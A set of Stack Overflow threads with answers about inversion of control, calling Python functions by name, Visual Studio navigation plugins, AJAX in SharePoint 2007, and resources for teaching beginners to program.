http://binstock.blogspot.in/2008/01/excellent-explanation-of-dependency.html
It says -
"Any nontrivial application is made up of two or more classes that
collaborate with each other to perform some business logic.
Traditionally, each object is responsible for obtaining its own
references to the objects it collaborates with (its dependencies).
When applying DI, the objects are given their dependencies at creation
time by some external entity that coordinates each object in the
system. In other words, dependencies are injected into objects."
A: IoC is about inverting the relationship between your code and third-party code (library/framework):
*
*In normal s/w development, you write the main() method and call "library" methods. You are in control :)
*In IoC the "framework" controls main() and calls your methods. The Framework is in control :(
DI (Dependency Injection) is about how the control flows in the application. Traditional desktop application had control flow from your application(main() method) to other library method calls, but with DI control flow is inverted that's framework takes care of starting your app, initializing it and invoking your methods whenever required.
In the end you always win :)
A: I like this explanation: http://joelabrahamsson.com/inversion-of-control-an-introduction-with-examples-in-net/
It start simple and shows code examples as well.
The consumer, X, needs the consumed class, Y, to accomplish something. That’s all good and natural, but does X really need to know that it uses Y?
Isn’t it enough that X knows that it uses something that has the behavior, the methods, properties etc, of Y without knowing who actually implements the behavior?
By extracting an abstract definition of the behavior used by X in Y, illustrated as I below, and letting the consumer X use an instance of that instead of Y it can continue to do what it does without having to know the specifics about Y.
In the illustration above Y implements I and X uses an instance of I. While it’s quite possible that X still uses Y what’s interesting is that X doesn’t know that. It just knows that it uses something that implements I.
Read article for further info and description of benefits such as:
*
*X is not dependent on Y anymore
*More flexible, implementation can be decided in runtime
*Isolation of code unit, easier testing
...
A: Programming speaking
IoC in easy terms: It's the use of Interface as a way of specific something (such a field or a parameter) as a wildcard that can be used by some classes. It allows the re-usability of the code.
For example, let's say that we have two classes : Dog and Cat. Both shares the same qualities/states: age, size, weight. So instead of creating a class of service called DogService and CatService, I can create a single one called AnimalService that allows to use Dog and Cat only if they use the interface IAnimal.
However, pragmatically speaking, it has some backwards.
a) Most of the developers don't know how to use it. For example, I can create a class called Customer and I can create automatically (using the tools of the IDE) an interface called ICustomer. So, it's not rare to find a folder filled with classes and interfaces, no matter if the interfaces will be reused or not. It's called BLOATED. Some people could argue that "may be in the future we could use it". :-|
b) It has some limitings. For example, let's talk about the case of Dog and Cat and I want to add a new service (functionality) only for dogs. Let's say that I want to calculate the number of days that I need to train a dog (trainDays()), for cat it's useless, cats can't be trained (I'm joking).
b.1) If I add trainDays() to the Service AnimalService then it also works with cats and it's not valid at all.
b.2) I can add a condition in trainDays() where it evaluates which class is used. But it will break completely the IoC.
b.3) I can create a new class of service called DogService just for the new functionality. But, it will increase the maintainability of the code because we will have two classes of service (with similar functionality) for Dog and it's bad.
A: Inversion of control is about transferring control from library to the client. It makes more sense when we talk about a client that injects (passes) a function value (lambda expression) into a higher order function (library function) that controls (changes) the behavior of the library function.
So, a simple implementation (with huge implications) of this pattern is a higher order library function (which accepts another function as an argument). The library function transfers control over its behavior by giving the client the ability to supply the "control" function as an argument.
For example, library functions like "map", "flatMap" are IoC implementations.
Of course, a limited IoC version is, for example, a boolean function parameter. A client may control the library function by switching the boolean argument.
A client or framework that injects library dependencies (which carry behavior) into libraries may also be considered IoC
A: Before using Inversion of Control you should be well aware of the fact that it has its pros and cons and you should know why you use it if you do so.
Pros:
*
*Your code gets decoupled so you can easily exchange implementations of an interface with alternative implementations
*It is a strong motivator for coding against interfaces instead of implementations
*It's very easy to write unit tests for your code because it depends on nothing else than the objects it accepts in its constructor/setters and you can easily initialize them with the right objects in isolation.
Cons:
*
*IoC not only inverts the control flow in your program, it also clouds it considerably. This means you can no longer just read your code and jump from one place to another because the connections that would normally be in your code are not in the code anymore. Instead it is in XML configuration files or annotations and in the code of your IoC container that interprets these metadata.
*There arises a new class of bugs where you get your XML config or your annotations wrong and you can spend a lot of time finding out why your IoC container injects a null reference into one of your objects under certain conditions.
Personally I see the strong points of IoC and I really like them but I tend to avoid IoC whenever possible because it turns your software into a collection of classes that no longer constitute a "real" program but just something that needs to be put together by XML configuration or annotation metadata and would fall (and falls) apart without it.
A: What is it? Inversion of (Coupling) Control, changes the direction of coupling for the method signature. With inverted control, the definition of the method signature is dictated by the method implementation (rather than the caller of the method). Full explanation here
Which problem does it solve? Top down coupling on methods. This subsequently removes need for refactoring.
When is it appropriate to use and when not? For small well defined applications that are not subject to much change, it is likely an overhead. However, for less defined applications that will evolve, it reduces the inherent coupling of the method signature. This gives the developers more freedom to evolve the application, avoiding the need to do expensive refactoring of code. Basically, allows the application to evolve with little rework.
A: To understand IoC, we should talk about Dependency Inversion.
Dependency inversion: Depend on abstractions, not on concretions.
Inversion of control: Main vs Abstraction, and how the Main is the glue of the systems.
I wrote about this with some good examples, you can check them here:
https://coderstower.com/2019/03/26/dependency-inversion-why-you-shouldnt-avoid-it/
https://coderstower.com/2019/04/02/main-and-abstraction-the-decoupled-peers/
https://coderstower.com/2019/04/09/inversion-of-control-putting-all-together/
A: Inversion of control is an indicator for a shift of responsibility in the program.
There is an inversion of control every time when a dependency is granted ability to directly act on the caller's space.
The smallest IoC is passing a variable by reference, lets look at non-IoC code first:
function isVarHello($var) {
return ($var === "Hello");
}
// Responsibility is within the caller
$word = "Hello";
if (isVarHello($word)) {
$word = "World";
}
Let's now invert the control by shifting the responsibility of a result from the caller to the dependency:
function changeHelloToWorld(&$var) {
// Responsibility has been shifted to the dependency
if ($var === "Hello") {
$var = "World";
}
}
$word = "Hello";
changeHelloToWorld($word);
Here is another example using OOP:
<?php
class Human {
private $hp = 0.5;
function consume(Eatable $chunk) {
// $this->chew($chunk);
$chunk->unfoldEffectOn($this);
}
function incrementHealth() {
$this->hp++;
}
function isHealthy() {}
function getHungry() {}
// ...
}
interface Eatable {
public function unfoldEffectOn($body);
}
class Medicine implements Eatable {
function unfoldEffectOn($human) {
// The dependency is now in charge of the human.
$human->incrementHealth();
$this->depleted = true;
}
}
$human = new Human();
$medicine = new Medicine();
if (!$human->isHealthy()) {
$human->consume($medicine);
}
var_dump($medicine);
var_dump($human);
*) Disclaimer: The real world human uses a message queue.
A: I think of Inversion of Control in the context of using a library or a framework.
The traditional way of "control" is that we build a controller class (usually main, but it could be anything), import a library and then use your controller class to "control" the action of the software components. Like your first C/Python program (after Hello World).
import pandas as pd
df = new DataFrame()
# Now do things with the dataframe.
In this case, we need to know what a Dataframe is in order to work with it. You need to know what methods to use, how values it takes and so on. If you add it to your own class through polymorphism or just calling it anew, your class will need the DataFrame library to work properly.
"Inversion of Control" means that the process is reversed. Instead of your classes controlling elements of a library, framework or engine, you register classes and send them back to the engine to be controlled. Worded another way, IoC can mean we are using our code to configuring a framework. You could also think of it as similar to the way we use functions in map or filter to deal with data in a list, except apply that to an entire application.
If you are the one who has built the engine, then you are probably using Dependency Injection approaches (described above) to make that happen. If you are the one using the engine (more common), then you should be able to just declare classes, add appropriate notations and let the framework do the rest of the work (e.g. creating routes, assigning servlets, setting events, outputting widgets etc.) for you.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3058",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2264"
} |
Q: Calling a function of a module by using its name (a string) How do I call a function, using a string with the function's name? For example:
import foo
func_name = "bar"
call(foo, func_name) # calls foo.bar()
A: Nobody mentioned operator.attrgetter yet:
>>> from operator import attrgetter
>>> l = [1, 2, 3]
>>> attrgetter('reverse')(l)()
>>> l
[3, 2, 1]
>>>
A: The best answer according to the Python programming FAQ would be:
functions = {'myfoo': foo.bar}
mystring = 'myfoo'
if mystring in functions:
functions[mystring]()
The primary advantage of this technique is that the strings do not need to match the names of the functions. This is also the primary technique used to emulate a case construct
A: getattr calls method by name from an object.
But this object should be parent of calling class.
The parent class can be got by super(self.__class__, self)
class Base:
def call_base(func):
"""This does not work"""
def new_func(self, *args, **kwargs):
name = func.__name__
getattr(super(self.__class__, self), name)(*args, **kwargs)
return new_func
def f(self, *args):
print(f"BASE method invoked.")
def g(self, *args):
print(f"BASE method invoked.")
class Inherit(Base):
@Base.call_base
def f(self, *args):
"""function body will be ignored by the decorator."""
pass
@Base.call_base
def g(self, *args):
"""function body will be ignored by the decorator."""
pass
Inherit().f() # The goal is to print "BASE method invoked."
A: *
*Using locals(), which returns a dictionary with the current local symbol table:
locals()["myfunction"]()
*Using globals(), which returns a dictionary with the global symbol table:
globals()["myfunction"]()
A: The answer (I hope) no one ever wanted
Eval like behavior
getattr(locals().get("foo") or globals().get("foo"), "bar")()
Why not add auto-importing
getattr(
locals().get("foo") or
globals().get("foo") or
__import__("foo"),
"bar")()
In case we have extra dictionaries we want to check
getattr(next((x for x in (f("foo") for f in
[locals().get, globals().get,
self.__dict__.get, __import__])
if x)),
"bar")()
We need to go deeper
getattr(next((x for x in (f("foo") for f in
([locals().get, globals().get, self.__dict__.get] +
[d.get for d in (list(dd.values()) for dd in
[locals(),globals(),self.__dict__]
if isinstance(dd,dict))
if isinstance(d,dict)] +
[__import__]))
if x)),
"bar")()
A: Based on Patrick's solution, to get the module dynamically as well, import it using:
module = __import__('foo')
func = getattr(module, 'bar')
func()
A: For what it's worth, if you needed to pass the function (or class) name and app name as a string, then you could do this:
myFnName = "MyFn"
myAppName = "MyApp"
app = sys.modules[myAppName]
fn = getattr(app,myFnName)
A: Try this. While this still uses eval, it only uses it to summon the function from the current context. Then, you have the real function to use as you wish.
The main benefit for me from this is that you will get any eval-related errors at the point of summoning the function. Then you will get only the function-related errors when you call.
def say_hello(name):
print 'Hello {}!'.format(name)
# get the function by name
method_name = 'say_hello'
method = eval(method_name)
# call it like a regular function later
args = ['friend']
kwargs = {}
method(*args, **kwargs)
A: i'm facing the similar problem before, which is to convert a string to a function. but i can't use eval() or ast.literal_eval(), because i don't want to execute this code immediately.
e.g. i have a string "foo.bar", and i want to assign it to x as a function name instead of a string, which means i can call the function by x() ON DEMAND.
here's my code:
str_to_convert = "foo.bar"
exec(f"x = {str_to_convert}")
x()
as for your question, you only need to add your module name foo and . before {} as follows:
str_to_convert = "bar"
exec(f"x = foo.{str_to_convert}")
x()
WARNING!!! either eval() or exec() is a dangerous method, you should confirm the safety.
WARNING!!! either eval() or exec() is a dangerous method, you should confirm the safety.
WARNING!!! either eval() or exec() is a dangerous method, you should confirm the safety.
A: Given a module foo with method bar:
import foo
bar = getattr(foo, 'bar')
result = bar()
getattr can similarly be used on class instance bound methods, module-level methods, class methods... the list goes on.
A: As this question How to dynamically call methods within a class using method-name assignment to a variable [duplicate] marked as a duplicate as this one, I am posting a related answer here:
The scenario is, a method in a class want to call another method on the same class dynamically, I have added some details to original example which offers some wider scenario and clarity:
class MyClass:
def __init__(self, i):
self.i = i
def get(self):
func = getattr(MyClass, 'function{}'.format(self.i))
func(self, 12) # This one will work
# self.func(12) # But this does NOT work.
def function1(self, p1):
print('function1: {}'.format(p1))
# do other stuff
def function2(self, p1):
print('function2: {}'.format(p1))
# do other stuff
if __name__ == "__main__":
class1 = MyClass(1)
class1.get()
class2 = MyClass(2)
class2.get()
Output (Python 3.7.x)
function1: 12
function2: 12
A: none of what was suggested helped me. I did discover this though.
<object>.__getattribute__(<string name>)(<params>)
I am using python 2.66
Hope this helps
A: Although getattr() is elegant (and about 7x faster) method, you can get return value from the function (local, class method, module) with eval as elegant as x = eval('foo.bar')(). And when you implement some error handling then quite securely (the same principle can be used for getattr). Example with module import and class:
# import module, call module function, pass parameters and print retured value with eval():
import random
bar = 'random.randint'
randint = eval(bar)(0,100)
print(randint) # will print random int from <0;100)
# also class method returning (or not) value(s) can be used with eval:
class Say:
def say(something='nothing'):
return something
bar = 'Say.say'
print(eval(bar)('nice to meet you too')) # will print 'nice to meet you'
When module or class does not exist (typo or anything better) then NameError is raised. When function does not exist, then AttributeError is raised. This can be used to handle errors:
# try/except block can be used to catch both errors
try:
eval('Say.talk')() # raises AttributeError because function does not exist
eval('Says.say')() # raises NameError because the class does not exist
# or the same with getattr:
getattr(Say, 'talk')() # raises AttributeError
getattr(Says, 'say')() # raises NameError
except AttributeError:
# do domething or just...
print('Function does not exist')
except NameError:
# do domething or just...
print('Module does not exist')
A: In python3, you can use the __getattribute__ method. See following example with a list method name string:
func_name = 'reverse'
l = [1, 2, 3, 4]
print(l)
>> [1, 2, 3, 4]
l.__getattribute__(func_name)()
print(l)
>> [4, 3, 2, 1]
A: Just a simple contribution. If the class that we need to instance is in the same file, we can use something like this:
# Get class from globals and create an instance
m = globals()['our_class']()
# Get the function (from the instance) that we need to call
func = getattr(m, 'function_name')
# Call it
func()
For example:
class A:
def __init__(self):
pass
def sampleFunc(self, arg):
print('you called sampleFunc({})'.format(arg))
m = globals()['A']()
func = getattr(m, 'sampleFunc')
func('sample arg')
# Sample, all on one line
getattr(globals()['A'](), 'sampleFunc')('sample arg')
And, if not a class:
def sampleFunc(arg):
print('you called sampleFunc({})'.format(arg))
globals()['sampleFunc']('sample arg')
A: Given a string, with a complete python path to a function, this is how I went about getting the result of said function:
import importlib
function_string = 'mypackage.mymodule.myfunc'
mod_name, func_name = function_string.rsplit('.',1)
mod = importlib.import_module(mod_name)
func = getattr(mod, func_name)
result = func()
A: You means get the pointer to an inner function from a module
import foo
method = foo.bar
executed = method(parameter)
This is not a better pythonic way indeed is possible for punctual cases
A: This is a simple answer, this will allow you to clear the screen for example. There are two examples below, with eval and exec, that will print 0 at the top after cleaning (if you're using Windows, change clear to cls, Linux and Mac users leave as is for example) or just execute it, respectively.
eval("os.system(\"clear\")")
exec("os.system(\"clear\")")
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3061",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "2330"
} |
Q: Plugin for Visual Studio to Mimic Eclipse's "Open Type" or "Open Resource" Keyboard Access If you've ever used Eclipse, you've probably noticed the great keyboard shortcuts that let you hit a shortcut key combination, then just type the first few characters of a function, class, filename, etc. It's even smart enough to put open files first in the list.
I'm looking for a similar functionality for Visual Studio 2008. I know there's a findfiles plugin on codeproject, but that one is buggy and a little weird, and doesn't give me access to functions or classes.
A: This isn't exactly the same as Eclipse from your description, but Visual Studio has some similar features out of the box (I've never used Visual Assist X, but it does sound interesting).
The Find ComboBox in the toolbar ends up being a sort of "Visual Studio command line". You can press Ctrl+/ (by default) to set focus there, and Visual Studio will insert an ">" at the beginning of the text (indicating that you want to enter a command instead of search). It even auto-completes as you type, helping you to find commands.
Anyway, to open a file from there, type "open <filename>". It will display any matching files in the drop down as you type (it pulls the list of files from the currently open solution).
To quickly navigate to a function, in the code editor press Ctrl+I to start an incremental search. Then just start typing until you find what you are looking for. Press Escape to cancel the search, or F3 to search again using the same query. As you are typing in the search query, the status bar in the lower left corner will contain what Visual Studio is searching for. Granted, this won't search across multiple files (I've never used Eclipse much, but that sounds like what it does from your description), but hopefully it will help you at least a little bit.
A: If anyone stumbles upon this thread:
There's a free plugin (created by me) for Visual Studio 2008 that mimics the Eclipse Ctrl+Shift+R Open Resource dialog (note, not the Open Type dialog). It works with any language and/or project type.
You can find it at Visual Studio Gallery.
A: Vs11 (maybe 2010 had it too) has the Navigate To... functionality which (on my machine) has the Ctrl+, shortcut.
By the way it understands capitals as camelcase-shortucts (eclipse does so too). For instance type HH to get HtmlHelper.
A: Some of the neat features are available in Visual Assist X, though not all of them. I've asked on their forums, but they haven't appeared as yet. VAX gets updated regularly on a rough 4 week period for bug fixes and a new feature every couple of months.
A: Resharper does this with the Ctrl-N keyword. Unfortunately it doesn't come for free.
Visual Studio doesn't have anything like this feature beyond Find.
A: If you are looking for an add-in like this to quickly navigate to source files in your project:
try the Visual Studio 2005/2008 add-in SonicFileFinder.
A: Found this thread while searching for Eclipse's Ctrl+Shift+R, and after seeing the Visual Studio Gallery, found the DPack Tools (they are free, and no, I'm not endorsed in any way by them).
But it's exactly what I was searching:
- Alt+U -> File Browser (a la Eclipse Ctrl+Shift+R)
- Alt+M -> Code Browser (Method list in the actual class)
It has more features, but I'm happy with these ones.
A: I have been using biterScripting along with Visual Studio to do more flexible searching and manipulation.
*
*It can search the entire workspace.
*It can search within any project - EVEN IF THAT PROJECT IS NOT LOADED OR EVEN PART OF A WORKSPACE.
*It can find things using regular expressions.
*AND, ABOVE ALL, it can make bulk changes. For example, want to change the name of a class from CCustomer to CUser, I can do it in just a few command lines - Actually, I have written scripts for things like this I do often. I DON'T HAVE TO CLICK ON EACH INSTANCE AND MANUALLY DO THE CHANGE.
*And, it is inexpensive ($0). I downloaded it from http://www.biterscripting.com .
A: I'm also comming from the Java Development side and was looking for the CTRL+T feature in the Visual Studio. The other answers refer to open file, but since in C# the class name and file name can be different this is not what i was looking for.
With the Class View or the Object Browser you can search for Objects and Classes
[View]->[Class View] or [View]->[Object]
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3067",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "23"
} |
Q: Can ASP.NET AJAX partial rendering work inside a SharePoint 2007 application page? I have a simple page with my ScriptManager and my UpdatePanel, and my ContentTemplate has one ListBox and one Label. I am just trying to catch its OnSelectionChanged so I can update the text in the Label. No matter what settings I try to tweak, I always get a full-page postback.
Is this really not going to work, or am I just screwing this up?
A: You need to have Sharepoint 2007 service pack 1 -- or else there's no chance.
(Sharepoint 2007 predates ajax 1.0 -- they built some support into service pack 1)
Next, from a trouble shooting point of view, test that the exact same code functions as expected when hosted in a regular asp.net page. (Literally copy and paste your code across into a fresh page, to rule out any typographical errors). Ruling sharepoint in or out of the problem area will help narrow down the solution space.
A: If you have installed SharePoint 2007 (without Service Pack 1) then you can follow an example like the following article:
AjaxBasePart: Easy ASP.NET 2.0 AJAX Extensions 1.0 and Office SharePoint Server 2007
The reason for this is that there exists a specific problem with mixing doPostback, UpdatePanel and SharePoint -- and the symptom is exactly what you're seeing: a full-page postback instead of an asynchronous postback. See this KB article for a workaround: A Web Part that contains an ASP.NET AJAX 1.0 UpdatePanel control that uses the _doPostBack() ...
Otherwise you can just install Service Pack 1 to fix your problem:
Windows SharePoint Services 3.0 Service Pack 1 (SP1)
A: There's a specific problem with mixing doPostback, UpdatePanel and SharePoint -- and the symptom is exactly what you're seeing: a full-page postback instead of an asynchronous postback. See this KB article for a workaround: http://support.microsoft.com/kb/941955
A: Todd Bleeker at Mindsharp showed me a piece of code he wrote that can use Ajax on Sharepoint 2.0. It was pretty cool. I believe the company used it on their sharepoint site managment software if you want to take a look. (you used to be able to request a 30 day trial). I bet how to do it is on their yahoo group (I can't remember the name, but I am sure that if you search for mindsharp you'll find it.)
As a note, Ajax has been around for a long time. Microsoft easily supported it since 2002 maybe earlier with the release of IE 5.5 (I don't know about other browsers, I was doing internal development and we only supported ie at the time). It just wasn't called that. The term Ajax is nothing more than a marketing term that someone coined later on.
A: Getting the latest service pack for SharePoint 2007 will resolve your problem (and add full support for AJAX). Without the service pack you will need to follow an example like that outlined in this article:
AjaxBasePart: Easy ASP.NET 2.0 AJAX Extensions 1.0 and Office SharePoint Server 2007
Posting this hear so that people know there is an answer even without the latest service pack (secretGeek's response seems to say there is no chance).
A: From a technology standpoint, Service Pack 1 does not add full support for ASP.NET AJAX. You still need use the workarounds described in the various articles mentioned in the previous answers.
Particulary, you need to make sure that the web.config file for your SharePoint Web application has been updated to support the appropriate version of the ASP.NET AJAX Extentions.
The fact that the web.config had not been updated was the mostly likely cause of the problem described in the original question.
| {
"language": "en",
"url": "https://stackoverflow.com/questions/3075",
"timestamp": "2023-03-29T00:00:00",
"source": "stackexchange",
"question_score": "14"
} |
Q: Best ways to teach a beginner to program? Original Question
I am currently engaged in teaching my brother to program. He is a total beginner, but very smart. (And he actually wants to learn). I've noticed that some of our sessions have gotten bogged down in minor details, and I don't feel I've been very organized. (But the answers to this post have helped a lot.)
What can I do better to teach him effectively? Is there a logical order that I can use to run through concept by concept? Are there complexities I should avoid till later?
The language we are working with is Python, but advice in any language is welcome.
How to Help
If you have good ones please add the following in your answer:
*
*Beginner Exercises and Project Ideas
*Resources for teaching beginners
*Screencasts / blog posts / free e-books
*Print books that are good for beginners
Please describe the resource with a link to it so I can take a look. I want everyone to know that I have definitely been using some of these ideas. Your submissions will be aggregated in this post.
Online Resources for teaching beginners:
*
*A Gentle Introduction to Programming Using Python
*How to Think Like a Computer Scientist
*Alice: a 3d program for beginners
*Scratch (A system to develop programming skills)
*How To Design Programs
*Structure and Interpretation of Computer Programs
*Learn To Program
*Robert Read's How To Be a Programmer
*Microsoft XNA
*Spawning the Next Generation of Hackers
*COMP1917 Higher Computing lectures by Richard Buckland (requires iTunes)
*Dive into Python
*Python Wikibook
*Project Euler - sample problems (mostly mathematical)
*pygame - an easy python library for creating games
*Invent Your Own Computer Games With Python
*Foundations of Programming for a next step beyond basics.
*Squeak by Example
*Snake Wrangling For Kids (It's not just for kids!)
Recommended Print Books for teaching beginners
*
*Accelerated C++
*Python Programming for the Absolute Beginner
*Code by Charles Petzold
*Python Programming: An Introduction to Computer Science 2nd Edition
A: I don't know if anyone has mentioned this here, yet, but You might want to check out Zed Shaw's Learn Python the Hard Way
Hope this Helps
A: http://tryruby.hobix.com/">Try Ruby (In Your Browser)
A: How to Design Programs
Structure and Interpretation of Computer Programs . Videos lectures at http://www.swiss.ai.mit.edu/classes/6.001/abelson-sussman-lectures/
A: This is a fantastic book which my little brothers used to learn:
http://pine.fm/LearnToProgram/
Of course, the most important thing is to start on a real, useful program of some kind IMMEDIATELY after finishing the book.
A: If he's interested, aren't the minor details the good parts? Using python, you've already cut the GUI off of it so that confusion is gone. Why not pick a project, a game or something, and implement it. The classic hi-lo number guessing game can be simply implemented from the command line in 20-30 lines of code (depending on language of course) and gives you variables, conditions, loops, and user input.
A: I'd just let him write tons of code. Let him drive in everything you guys do, and just be available to answer questions.
Believe it or not, after a few months of writings tons of crappy code, he'll start to get the idea and start writing better programs. At that point, you can get bogged down in details (memory, etc), and also talk about general design principles.
I've heard that what separates the great artists from the mediocre ones, is that every time they practice, they improve on something, no matter how small. Let your brother practice, and he'll improve every time he sits down at the keyboard.
Edit: [Justin Standard]
Esteban, this reminds me of a recent coding horror post, and I do think you are right. But I think its still worthwhile to find methods to guide his practice. No question, I want him writing as much code as he knows how to do. Thats one reason I'm asking for sample projects.
A: You could try using Alice. It's a 3D program designed for use in introductory programming classes.
The two biggest obstacles for new programmers are often:
*
*syntax errors
*motivation (writing something meaningful and fun rather than contrived)
Alice uses a drag and drop interface for constructing programs, avoiding the possibility of syntax errors. Alice lets you construct 3D worlds and have your code control (simple) 3D characters and animation, which is usually a lot more interesting than implementing linked lists.
Experienced programmers may look down at Alice as a toy and scoff at dragging and dropping lines of code, but research shows that this approach works.
Disclaimer: I worked on Alice.
A: I recommend Logo (aka the turtle) to get the basic concepts down. It provides a good sandbox with immediate graphical feedback, and you can demostrate loops, variables, functions, conditionals, etc. This page provides an excellent tutorial.
After Logo, move to Python or Ruby. I recommend Python, as it's based on ABC, which was invented for the purpose of teaching programming.
When teaching programming, I must second EHaskins's suggestion of simple projects and then complex projects. The best way to learn is to start with a definite outcome and a measurable milestone. It keeps the lessons focused, allows the student to build skills and then build on those skills, and gives the student something to show off to friends. Don't underestimate the power of having something to show for one's work.
Theoretically, you can stick with Python, as Python can do almost anything. It's a good vehicle to teach object-oriented programming and (most) algorithms. You can run Python in interactive mode like a command line to get a feel for how it works, or run whole scripts at once. You can run your scripts interpreted on the fly, or compile them into binaries. There are thousands of modules to extend the functionality. You can make a graphical calculator like the one bundled with Windows, or you can make an IRC client, or anything else.
XKCD describes Python's power a little better:
You can move to C# or Java after that, though they don't offer much that Python doesn't already have. The benefit of these is that they use C-style syntax, which many (dare I say most?) languages use. You don't need to worry about memory management yet, but you can get used to having a bit more freedom and less handholding from the language interpreter. Python enforces whitespace and indenting, which is nice most of the time but not always. C# and Java let you manage your own whitespace while remaining strongly-typed.
From there, the standard is C or C++. The freedom in these languages is almost existential. You are now in charge of your own memory management. There is no garbage collection to help you. This is where you teach the really advanced algorithms (like mergesort and quicksort). This is where you learn why "segmentation fault" is a curse word. This is where you download the source code of the Linux kernel and gaze into the Abyss. Start by writing a circular buffer and a stack for string manipulation. Then work your way up.
A: First of all, start out like everyone else does: with a Hello World program. It's simple, and it gives them a basic feel for the layout of a program. Try and remember back to when you were first programming, and how difficult some of the concepts were - start simple.
After Hello World, move on to creating some basic variables, arithmetic, then onto boolean logic and if/else statements. If you've got one of your old programming textbooks, check out some of the early examples and have him run through those. Just don't try to introduce too much all at once, or it will be overwhelming and confusing.
A: Something you should be very mindful of while teaching your brother to program is for him not to rely too heavily on you. Often when I find myself helping others they will begin to think of me as answer book to all of their questions and instead of experimenting to find an answer they simply ask me. Often the best teacher is experimentation and every time your brother has a question like "What will happen if I add 2 to a string?" you should tell him to try it out and see for himself. Also I have noticed that when I cannot get a concept through to someone, it helps to see some sample code where we can look at each segment individually and explain it piece by piece. As a side note people new to programming often have trouble with the idea of object oriented programming, they will say they understand it when you teach it to them but will not get a clear concept of it until actually implementing it.
A: I used to teach programming and your brother has one main advantage over most of my students he wants to learn :)
If you decide to go with C a friend has a site that has the sort of programs those of use from older generations remember as basic type-ins. The more complex of them use ncurses which sort of negates their use as a teaching aid somewhat but some of them are tiny little things and you can learn loads without being taught to.
Personally I think Python and Ruby would make great first languages.
EDIT:
list of beginner programming assignments appeared overnight might be just what you are looking for.
A: It really depends on your brother's learning style. Many people learn faster by getting their hands dirty & just getting into it, crystallising the concepts and the big picture as they progress and build their knowledge.
Me, I prefer to start with the big picture and drill down into the nitty-gritty. The first thing I wanted to know was how it all fits together then all that Object-oriented gobbledygook, then about classes & instances and so-on. I like to know the underlying concepts and a bit of theory before I learn the syntax. I had a bit of an advantage because I wrote some games in BASIC 20 years ago but nothing much since.
Perhaps it is useful to shadow a production process by starting with an overall mission statement, then a plan and/or flowchart, then elaborate into some pseudo code (leaning towards the syntax you will ultimately use) before actually writing the code.
The golden rule here is to suss out your student's leaning style.
A: If your brother has access to iTunes, he can download video lectures of an introductory computer science course given by Richard Buckland at the University of New South Wales. He's an engaging instructor and covers fundamentals of computing and the C language. If nothing else, tell your brother to play the vids in the background and some concepts might sink in through osmosis. :)
COMP1917 Higher Computing - 2008 Session 1
http://deimos3.apple.com/WebObjects/Core.woa/Browse/unsw.edu.au.1504975442.01504975444
If the link doesn't work, here's a path:
Home -> iTunes U --> Engineering --> COMP1917 Higher Computing - 2008 Session 1
A: there's a wikibook that is pretty good for learning python.
I don't know how the wikibooks are for other languages, but I personally learned python from the wikibook as it was in Feb 2007
ps - if you're unfamiliar with wikibooks, it's basically the wikipedia version of book authoring. it's sort of hard to describe, but if you check out a few of the books on there you'll see how it works
A: Python Programming for the absolute beginner
Python Programming for the absolute beginner cover http://safari.oreilly.com/images/1592000738/1592000738_xs.jpg
A: I think Python is a great idea. I would give him a few basic assignments to do on his own and tell him that any dead ends he hits can probably be resolved by a trip to google. For me, at least, solving a problem on my own always made it stick better than someone telling me the solution.
Some possible projects (in no particular order):
*
*Coin flip simulator. Let the user input a desired number of trials for the coin flipping. Execute it and display the results along with the percentage for heads or tails.
*Make a temperature converter with a menu that takes user input to choose which kind of conversion the user wants to do. After choosing the conversion and doing it, it should return to the main menu.
Here's an example of an extended converter with the same idea: http://pastebin.org/6541
*Make a program that takes a numeric input and displays the letter grade it would translate to. It'll end up evaluating the input against if and elif statements to find where it fits.
*Make a simple quiz that goes through several multiple choice or fill in the blank questions. At the end it will display how the user did. He can pick any questions he wants.
*Take an input of some (presumably large) number of pennies and convert it into bigger denominations. For example, 149 pennies = 1 dollar, 1 quarter, 2 dimes, and 4 pennies.
*Create a simple list manager. Be able to add/delete lists and add/delete entries in those lists. Here's an example of a christmas list manager: http://pastebin.org/6543
*Create a program that will build and then test whether entered numbers form a magic square (with a 2D array). Here's some sample code, but it should really print out the square at each step in order to show where the user is in terms of buliding the square: http://pastebin.org/6544
I would also suggest doing some stuff with xTurtle or another graphics module to mix things up and keep him from getting boring. Of course, this is very much practice programming and not the scripting that a lot of people would really be using python for, but the examples I gave are pretty much directly taken from when I was learning via python and it worked out great for me. Good luck!
A: Just make it fun !
Amazingly Scala might be the easiest if you try Kojo
A: If your brother likes puzzles, I would recommend Python Challenge. I wouldn't use it as a formal teaching tool in a 1 on 1 tutorial, but it's something he can do when you're not together to challenge himself and have some fun.
A: Python Challenge
A: After going through a few free e-books, I found the best book for learning to program was Head First Programming published by O'Reily Press. It uses Python as the language and gives you programs to work on from the very start. They are all more interesting that 'Hello World'.
It's well worth the money I spent on it, and since it's been out for a bit you may be able to find a cheaper used copy on Ebay or Amazon.
A: A good python course is MIT's A Gentle Introduction to Programming Using Python. It's all free online, and you don't have to be an MIT uberstudent to understand it.
Edit [Justin Standard]
This course uses this free online book: How To Think Like a Computer Scientist
I'm definitely finding it quite useful.
A: Python package VPython -- 3D Programming for Ordinary Mortal (video tutorial).
Code example:
from visual import *
floor = box (pos=(0,0,0), length=4, height=0.5, width=4, color=color.blue)
ball = sphere (pos=(0,4,0), radius=1, color=color.red)
ball.velocity = vector(0,-1,0)
dt = 0.01
while 1:
rate (100)
ball.pos = ball.pos + ball.velocity*dt
if ball.y < ball.radius:
ball.velocity.y = -ball.velocity.y
else:
ball.velocity.y = ball.velocity.y - 9.8*dt
VPython bouncing ball http://vpython.org/bounce.gif
A: Begin with Turtle graphics in Python.
I would use the turtle graphics which comes standard with Python. It is visual, simple and you could use this environment to introduce many programming concepts like iteration and procedure calls before getting too far into syntax. Consider the following interactive session in python:
>>> from turtle import *
>>> setup()
>>> title("turtle test")
>>> clear()
>>>
>>> #DRAW A SQUARE
>>> down() #pen down
>>> forward(50) #move forward 50 units
>>> right(90) #turn right 90 degrees
>>> forward(50)
>>> right(90)
>>> forward(50)
>>> right(90)
>>> forward(50)
>>>
>>> #INTRODUCE ITERATION TO SIMPLIFY SQUARE CODE
>>> clear()
>>> for i in range(4):
forward(50)
right(90)
>>>
>>> #INTRODUCE PROCEDURES
